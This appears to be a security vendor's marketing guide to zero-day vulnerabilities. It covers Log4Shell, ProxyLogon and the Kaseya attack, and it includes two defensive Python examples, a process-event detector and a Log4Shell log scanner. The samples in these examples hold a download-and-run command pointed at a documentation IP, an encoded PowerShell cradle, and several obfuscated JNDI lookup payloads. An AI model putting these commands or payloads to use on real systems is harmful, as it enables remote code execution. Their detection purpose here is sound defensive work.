THE ULTIMATE GUIDE TO
All you need to know about zero-day exploits and the crucial role they play in security.
A zero-day is a vulnerability that is unknown to the vendor and to defenders at the time it is found or exploited. That means no patch exists for it, and security teams have had zero days to develop a fix or plan remediation. If threat actors exploit a zero-day, they can cause serious damage while undetected, and even after the intrusion is discovered they can keep operating while security teams scramble to find a way to close the hole.
Discovering a zero-day vulnerability requires expert skill and creative tactics. Because of the skill and resources involved, petty criminals usually won’t bother looking for zero-days and go after known vulnerabilities instead. Most zero-days are discovered by vendors, security researchers or advanced adversaries.
Zero-day vulnerabilities are valuable entry points for espionage because attackers can get in undetected. Nation-states run government-sponsored programs with dedicated resources to find and exploit zero-days. For example, in early 2021 the Chinese state-sponsored group Hafnium chained several zero-day vulnerabilities in Microsoft Exchange Server (the ProxyLogon bugs, led by CVE-2021-26855) to compromise on-premises email servers.
Professional criminal groups with extensive resources put concentrated effort into finding zero-days to attack enterprises’ most valuable data and processes. Selling zero-days is also a lucrative business: exploits for widely used platforms command prices of over $1 million.
Not everyone looking for zero-days seeks to misuse them. Software vendors hunt for vulnerabilities in their own products so they can fix them before attackers find them.
Other white hat actors on the hunt for zero-days include independent security researchers and security vendors. Cybersecurity vendors need to think like attackers in order to find the latest vulnerabilities and prevent attacks. Although more zero-days were found this year (2021) than ever before, many of them were discovered by those on the right side of the law.
Because of the serious impact zero-days can cause, it’s crucial for security leaders to plan for them and build security programs resilient to zero-day attacks.
A zero-day vulnerability won’t be flagged by a vulnerability scanner, because scanners check for known issues and this one has no signature or CVE yet. It gives attackers a way into a corporate network that defenders are not looking for. But while zero-days are often described as “undetectable”, the exploit is only the entry point. What threat actors do after the initial foothold, such as dropping a web shell, spawning a command interpreter from the exploited service, establishing command-and-control, escalating privileges and moving laterally, looks the same whether the entry was a zero-day or a known vulnerability, so zero-day attacks can be detected by monitoring that post-exploitation behaviour.
By definition, a zero-day has no patch: nobody knew about the vulnerability, so nobody had a reason to develop a fix for it. Once it is discovered and the vendor ships a patch, security teams have to scramble to apply it, which takes time and resources. From that point the bug is usually called an N-day: a publicly known vulnerability, typically with a patch available, that attackers can still exploit on every system that has not yet been updated.
In the event of a zero-day attack, the pressure is on security teams to detect, respond and contain the threat before it spreads. If a breach is allowed to spread through a network undetected, the cost of remediation is high. Tracking down and repairing the damage requires system downtime and hundreds of staff hours. If attackers have accessed confidential information, enterprises may find themselves in breach of SLAs or data protection regulations and have to pay fines, and the reputational damage in turn leads to lost business. Successfully defending against zero-days requires robust, well-practised detection and incident response processes capable of spotting the signs of a zero-day attack.
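As an added illustration of the detection point above (example code written for this guide, not Randori’s product code): a small behavioural detector over process-creation events. It ignores how the attacker got in and flags the post-exploitation pattern that both the Exchange and Log4j intrusions shared, an internet-facing worker process spawning a command interpreter, plus command lines that download or run encoded payloads. The event fields, process-name lists and sample events are assumptions constructed for the example.

```python
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation event (fields assumed for this example; they map
    onto Sysmon event 1 or auditd execve records)."""
    host: str
    user: str
    parent_image: str   # executable that spawned the new process
    image: str          # executable of the new process
    command_line: str


# Worker processes that handle internet-facing requests. A zero-day in the
# application (Exchange, a Java web app, ...) is exploited inside one of these.
WEB_WORKERS = {"w3wp.exe", "httpd", "nginx", "java", "tomcat", "node"}

# Interpreters an attacker typically spawns right after gaining code execution.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash", "python", "perl"}

# Command-line fragments typical of download cradles and encoded payloads.
CRADLE_MARKERS = ("certutil", "-urlcache", "bitsadmin", "curl ", "wget ",
                  "invoke-webrequest", "iex(", "-enc ", "-encodedcommand")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of the behavioural rules that fire on one event."""
    findings = []
    if basename(ev.parent_image) in WEB_WORKERS and basename(ev.image) in SHELLS:
        findings.append("web-worker-spawned-shell")
    cmd = ev.command_line.lower()
    if any(marker in cmd for marker in CRADLE_MARKERS):
        findings.append("download-cradle-or-encoded-command")
    return findings


def detect(events: list[ProcessEvent]) -> list[tuple[int, str, list[str]]]:
    """Index, host and findings for every event that trips at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        findings = classify(ev)
        if findings:
            hits.append((i, ev.host, findings))
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # Exchange-style: IIS worker drops to cmd and runs encoded PowerShell
    ProcessEvent("mail01", "NT AUTHORITY\\SYSTEM",
                 r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # Log4Shell-style: Java service spawns sh to fetch and run a script
    ProcessEvent("app07", "tomcat", "/usr/bin/java", "/bin/sh",
                 'sh -c "curl http://203.0.113.7/x.sh | sh"'),
    # Benign: a user opens a prompt and lists a directory
    ProcessEvent("ws22", "CORP\\alice", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    # Benign: ASP.NET compiling a page; w3wp spawns csc.exe, not a shell
    ProcessEvent("mail01", "NT AUTHORITY\\SYSTEM",
                 r"C:\Windows\System32\inetsrv\w3wp.exe",
                 r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                 "csc.exe /noconfig /fullpaths @tmp.cmdline"),
    # Benign: scheduled backup script run by the service host
    ProcessEvent("fs03", "CORP\\svc_backup", r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for index, host, findings in detect(SAMPLE_EVENTS):
        print(f"event {index} on {host}: {', '.join(findings)}")
```

The two rules are deliberately independent of any CVE: the first only needs the parent/child relationship, the second only the command line, so neither needs updating when the next zero-day appears. The csc.exe and backup-script events show why the rule keys on interpreters rather than on "anything spawned by the web worker"; tune the sets to what your own servers legitimately launch.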
One recent high-profile zero-day is the Apache Log4j 2 vulnerability known as Log4Shell (CVE-2021-44228); it’s critical both because of its potential and its reach. It is reachable through many attack vectors: any input that ends up in a log message, from HTTP request headers to email subjects to chat and text messages, can carry a malicious JNDI lookup string (a ${jndi:…} expression) that the vulnerable library resolves by fetching and loading code from the attacker’s server. If exploited, attackers can take control of the system by executing code remotely.
Log4j 2 is a logging library used throughout Java software, and with an estimated 2.5 billion devices running Java, nearly any organisation can be affected. Because the vulnerability is so easy to exploit, it’s a prime target for ransomware threat actors. Randori Attack has tested the exploit and confirmed that it works, so that enterprises can quickly see whether they are exposed and act on it.
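As an added example (not part of the original guide and not Randori’s code): a scanner that looks for Log4Shell probe strings in web-server access-log lines. Attackers quickly started disguising the ${jndi:…} lookup with nested lookups such as ${lower:j}, the ${::-j} default-value trick, and URL-encoding, so the scanner first unwraps those obfuscations and only then searches for a JNDI lookup. The log lines are constructed for the example and use a documentation IP range; the unwrapping rules cover the common obfuscations seen in probes, not Log4j’s full lookup grammar.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested "${" and no "}" inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# What we are really looking for once the obfuscation is stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(match: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the three
    tricks seen in real probes: ${lower:X}, ${upper:X} and the
    ${name:-default} fallback (so ${::-j} and ${env:NOPE:-j} both become "j").
    Anything else is left in place."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.rsplit(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly collapse innermost lookups until the string
    stops changing. ${${lower:j}ndi:ldap://h/a} becomes ${jndi:ldap://h/a}."""
    current = unquote(text)
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(_resolve_inner, current)
        if resolved == current:
            break
        current = resolved
    return current


def is_log4shell_probe(text: str) -> bool:
    """True if the de-obfuscated text contains a JNDI lookup."""
    return _JNDI.search(normalize_lookups(text)) is not None


def scan_log(lines: list[str]) -> list[dict]:
    """One record per suspicious line: 1-based line number and the normalized
    form, which is what an analyst wants to see (and block)."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            hits.append({"line": number, "normalized": normalize_lookups(line)})
    return hits


# Constructed access-log lines (combined format); 203.0.113.0/24 is a
# documentation range, not a real attacker.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # A ${...} that is not a JNDI lookup must not fire.
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /search?q=${user.name} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    # Plain probe in the User-Agent header
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    # Nested lower: lookups hide the keyword from a naive grep
    '203.0.113.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    # Default-value trick spelling out j-n-d-i and r-m-i one letter at a time
    '203.0.113.7 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.7:1099/a}"',
    # URL-encoded probe in the query string
    '203.0.113.7 - - [10/Dec/2021:10:00:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {hit['line']}: {hit['normalized']}")
```

A plain grep for the literal string jndi: would catch only the third and sixth sample lines; normalizing first is what makes the nested and default-value variants visible. Log scanning is a stopgap that tells you who is probing; the remedy for Log4Shell is upgrading Log4j 2 to a fixed release.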
One of the most recent high-profile zero-day attacks targeted Kaseya VSA, remote monitoring and management software used by thousands of managed service providers worldwide. In July 2021 the Russian ransomware-as-a-service gang REvil exploited multiple zero-day vulnerabilities in on-premises VSA servers, including the authentication bypass CVE-2021-30116, before a patch had shipped. The attackers used VSA’s own update mechanism to push the ransomware to managed endpoints as a fake software update; as a result, roughly 1,500 downstream businesses had their systems encrypted.
The attack caused serious supply chain disruption as critical systems were encrypted by ransomware. Even MSP customers that were not hit experienced downtime. When the vulnerability became known, Kaseya asked all customers to shut down their on-premises VSA servers until a patch was available. Kaseya responded quickly, working with outside experts to develop a remediation plan and ship a patch within days, but even the best efforts couldn’t undo the damage that was already done.
Since millions of remote workers began relying on Zoom during the pandemic, multiple zero-day vulnerabilities have been discovered in it. In March 2020, two zero-days were reported, one of which allowed attackers to hijack Zoom’s microphone and camera permissions to spy on and even record meetings; another allowed malicious content to be delivered through chats.
In July 2020, another was reported by an anonymous security researcher. This vulnerability affected all users running Zoom on Windows 7 or earlier. It was fortunately discovered before it was exploited; it would have allowed attackers to remotely execute code without triggering any security warning. Zoom developed a patch, but users on older, unsupported Windows versions remained at elevated risk.
Because of the serious impact of zero-days, security vendors aim to find them before attackers do so that their customers are protected. In November 2021, Randori disclosed a serious zero-day vulnerability in Palo Alto Networks’ GlobalProtect VPN (CVE-2021-3064). Rated 9.8 on the CVSS scale, this memory corruption vulnerability would have allowed an unauthenticated attacker to execute arbitrary code on the firewall and disrupt system processes.
We found the vulnerability and tested its exploitability with Randori Attack, our continuous automated red teaming (CART) platform, and then disclosed it to Palo Alto Networks. Palo Alto Networks quickly developed an update with a patch for the affected versions. Because of Randori’s close collaboration with Palo Alto Networks, the vulnerability was patched before any exploitation in the wild was observed.
How can you discover or prevent zero-days before attackers have the chance to exploit them? It’s important to be vigilant and take advantage of the latest solutions.
Your attack surface, everything in your environment that’s exposed to the internet, is constantly expanding, which means more opportunities for unknown vulnerabilities to appear. To keep up, it’s worth investing in an attack surface management (ASM) solution. ASM continuously monitors your external attack surface, discovering misconfigurations and assets that security teams were unaware of, such as shadow IT.
When you’re aware of everything on your attack surface, you can take steps to protect your most valuable assets. A good ASM solution will not only let you know about vulnerabilities, but will also prioritize risk, so that security teams make the most efficient use of their time.
Red teaming tests your systems against real-world threats. This can be done either in-house or by hiring red team services. In a red team exercise, security professionals put your systems to the test using the techniques attackers currently use. A skilled red team will not only try to break in through known vulnerabilities, but will also think outside the box and may discover entirely new, zero-day vulnerabilities.
If a red team is unable to break in, you have reasonable evidence about your posture on that day, but it is a point-in-time exercise. Red team services are costly, and some systems may have to be taken offline while testing is carried out, so you can’t do this all the time.
Continuous automated red teaming (CART) is an automated solution that has a similar role to a red team. The advantage is that it can run all the time, rather than being a periodic event. It’s programmed with the techniques hackers use, and it constantly attacks authorized systems. If a breach is possible, security teams will be notified. CART ensures that your defenses are always ready and gives teams time to develop remediation before an actual attack occurs. Leading CART solutions are equipped with the ability to discover zero-day vulnerabilities.
To avoid being caught unawares by zero-days, you need a solution that uses authentic techniques. Let’s look at the key requirements for a solution to help you find and prevent zero-days.
The best solutions use a black-box discovery method. That means they start from the same place attackers do, with nothing more than an email address. There shouldn’t be any complex installation required.
It’s key for a security solution to have a genuine attacker’s perspective, to reveal the most tempting exposed assets on your system along with the most likely potential exploits. A combined solution is ideal, one that can uncover the unknowns on your attack surface and test your defenses to keep them sharp.
An ideal solution should have nation-state level discovery capabilities and leverage the latest techniques that hackers are exploiting in the wild. If it’s not at the level of real-world attackers, you won’t be fully protected.
It should have a demonstrated record of zero-day discoveries. Most solutions can identify known vulnerabilities and rank them according to the CVSS scale. But few have the ability to find zero-days and make them known before outside hackers discover them.
Because new threats are emerging all the time, continuous monitoring of your attack surface is essential. That way, you’ll be able to prepare your defense before an attack occurs.
A zero-day exploit is one of the most serious attacks because it could be ongoing for some time before you even know about it, and no patch exists until the vendor produces one. The consequences may cost millions.
To prevent zero-day attacks, you need to take a proactive approach by constantly monitoring your attack surface with a solution that’s equipped with advanced threat discovery techniques.
Randori Recon is the industry’s leading ASM software, the only ASM platform that brings a hacker’s perspective to your attack surface. Randori has a proven record of discovering zero-days.
With advanced reconnaissance techniques used by real threat actors, it gives you the power to identify, prioritize, and continuously monitor your most valuable exposed assets and risks so you can stay a step ahead of the attackers.
You also want to be able to test whether your system can withstand attacks. With a CART solution, you can constantly subject your system to authentic attacks to ensure your defenses are strong.
Eliminate guesswork for your team and obtain proof of what happens when a weakness is left unaddressed. Gain certainty of the highest risks and their potential consequences.
Are you ready to discover your attack surface and test your defenses? Try a demo of Randori Platform, including Randori Recon and Randori Attack, today.
And ensure you’re protected from zero-day exploits.